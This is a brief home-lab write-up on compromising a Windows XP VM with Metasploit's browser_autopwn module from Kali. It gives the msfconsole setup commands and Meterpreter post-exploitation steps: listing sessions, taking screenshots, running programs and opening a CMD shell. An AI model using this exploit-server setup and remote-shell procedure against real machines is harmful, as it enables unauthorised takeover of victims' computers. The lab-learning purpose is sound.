(Auto)pwning XP with Kali


Just some quick notes on exploiting a Windows XP VM at home.

I booted WinXP SP3 in a VMware VM with VMware Player and set the network to bridge (not auto-bridging). Next, select the network device: VirtualBox Host Adapter if you want your VirtualBox VMs to talk to the VMware one, or your regular NIC for your home/local network. Wait to get an IP. I had some issues and had to “disconnect” the NIC in VMware and reconnect. Check here if you need some help for the network setup.

In the msfconsole, this is how we’ll set up the autopwn:

msfconsole
msf> use auxiliary/server/browser_autopwn
msf> set LHOST <local IP>
msf> set URIPATH /
msf> set SRVPORT 80

Then visit <local IP> (the IP of your Kali box) in IE and see what happens. I was prompted to install/run an ActiveX control. That required that I download/install Java. I got prompted for an update but denied it. Metasploit opened a Meterpreter session on the Kali box.

Type sessions to see what meterpreter sessions are available (there will be no msf> prompt).

sessions -i <session ID> # drops to an interactive meterpreter shell with the machine

screenshot captures a screencap and saves it to your home directory (type display [filename] to see it)

execute -f explorer will open an explorer window on the XP machine

Type help to see all the options, such as shell, which drops into a CMD shell on the box. To get out of it, just type exit and you’ll return to the meterpreter shell.